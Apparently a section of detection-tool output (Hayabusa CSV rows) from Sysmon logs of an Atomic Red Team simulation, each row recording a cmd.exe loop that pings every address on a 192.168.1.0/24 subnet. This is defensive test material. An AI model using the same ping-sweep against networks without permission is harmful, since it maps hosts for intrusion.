+2019-07-19 23:52:48.567 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.148 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 948 | PGUID: 747F3D96-D940-5D31-0000-00104E263600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:49.026 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.149 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2136 | PGUID: 747F3D96-D941-5D31-0000-00103C293600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:49.408 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.150 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 868 | PGUID: 747F3D96-D941-5D31-0000-0010282C3600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:50.047 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.151 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5380 | PGUID: 747F3D96-D942-5D31-0000-0010142F3600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:50.521 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.152 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3712 | PGUID: 747F3D96-D942-5D31-0000-001013323600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:51.038 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.153 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 640 | PGUID: 747F3D96-D943-5D31-0000-0010FF343600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:51.517 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.154 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1680 | PGUID: 747F3D96-D943-5D31-0000-0010EB373600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:52.009 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.155 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4532 | PGUID: 747F3D96-D944-5D31-0000-0010D73A3600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:52.553 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.156 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5024 | PGUID: 747F3D96-D944-5D31-0000-00109E433600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:53.037 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.157 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2180 | PGUID: 747F3D96-D945-5D31-0000-0010A2463600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:53.555 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.158 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2168 | PGUID: 747F3D96-D945-5D31-0000-0010A2493600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:54.026 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.159 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1664 | PGUID: 747F3D96-D946-5D31-0000-0010904C3600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:54.529 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.160 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4016 | PGUID: 747F3D96-D946-5D31-0000-00107C4F3600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:54.999 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.161 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2780 | PGUID: 747F3D96-D946-5D31-0000-001068523600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:55.533 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.162 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4036 | PGUID: 747F3D96-D947-5D31-0000-001068553600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:56.017 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.163 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6332 | PGUID: 747F3D96-D948-5D31-0000-001054583600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:56.507 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.164 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4368 | PGUID: 747F3D96-D948-5D31-0000-0010405B3600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:57.003 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.165 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5480 | PGUID: 747F3D96-D948-5D31-0000-00102C5E3600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:57.544 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.166 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5316 | PGUID: 747F3D96-D949-5D31-0000-0010F3663600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:58.011 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.167 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1232 | PGUID: 747F3D96-D94A-5D31-0000-0010E8693600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:58.563 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.168 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6544 | PGUID: 747F3D96-D94A-5D31-0000-0010D76C3600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:59.016 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.169 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6300 | PGUID: 747F3D96-D94B-5D31-0000-0010CD6F3600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:59.522 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.170 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1988 | PGUID: 747F3D96-D94B-5D31-0000-0010B9723600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:00.077 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.171 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4032 | PGUID: 747F3D96-D94C-5D31-0000-0010BA763600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:00.621 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.172 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1604 | PGUID: 747F3D96-D94C-5D31-0000-0010B9793600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:01.018 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.173 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1596 | PGUID: 747F3D96-D94D-5D31-0000-0010EB853600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:01.515 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.174 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5952 | PGUID: 747F3D96-D94D-5D31-0000-0010D9883600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:02.019 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.175 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2752 | PGUID: 747F3D96-D94E-5D31-0000-0010C58B3600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:02.556 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.176 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1844 | PGUID: 747F3D96-D94E-5D31-0000-00108C943600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:03.031 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.177 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3856 | PGUID: 747F3D96-D94F-5D31-0000-001079973600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:03.557 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.178 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3796 | PGUID: 747F3D96-D94F-5D31-0000-0010659A3600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:04.044 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.179 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1244 | PGUID: 747F3D96-D950-5D31-0000-0010659D3600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:04.539 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.180 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3328 | PGUID: 747F3D96-D950-5D31-0000-001051A03600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:05.023 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.181 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 592 | PGUID: 747F3D96-D951-5D31-0000-00103EA33600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:05.517 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.182 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6288 | PGUID: 747F3D96-D951-5D31-0000-00102BA63600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:06.023 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.183 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3736 | PGUID: 747F3D96-D952-5D31-0000-001017A93600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:06.535 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.184 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1720 | PGUID: 747F3D96-D952-5D31-0000-001003AC3600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:07.047 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.185 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 752 | PGUID: 747F3D96-D953-5D31-0000-0010EFAE3600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:07.533 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.186 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3680 | PGUID: 747F3D96-D953-5D31-0000-0010B7B73600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:07.912 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.187 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1880 | PGUID: 747F3D96-D953-5D31-0000-0010A3BA3600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:08.521 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.188 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6172 | PGUID: 747F3D96-D954-5D31-0000-00108FBD3600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:09.043 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.189 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4464 | PGUID: 747F3D96-D955-5D31-0000-0010D6C03600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:09.515 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.190 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 684 | PGUID: 747F3D96-D955-5D31-0000-0010C2C33600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:10.036 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.191 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 504 | PGUID: 747F3D96-D956-5D31-0000-0010AEC63600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:10.556 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.192 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6608 | PGUID: 747F3D96-D956-5D31-0000-00109AC93600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:11.022 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.193 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1128 | PGUID: 747F3D96-D957-5D31-0000-001086CC3600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
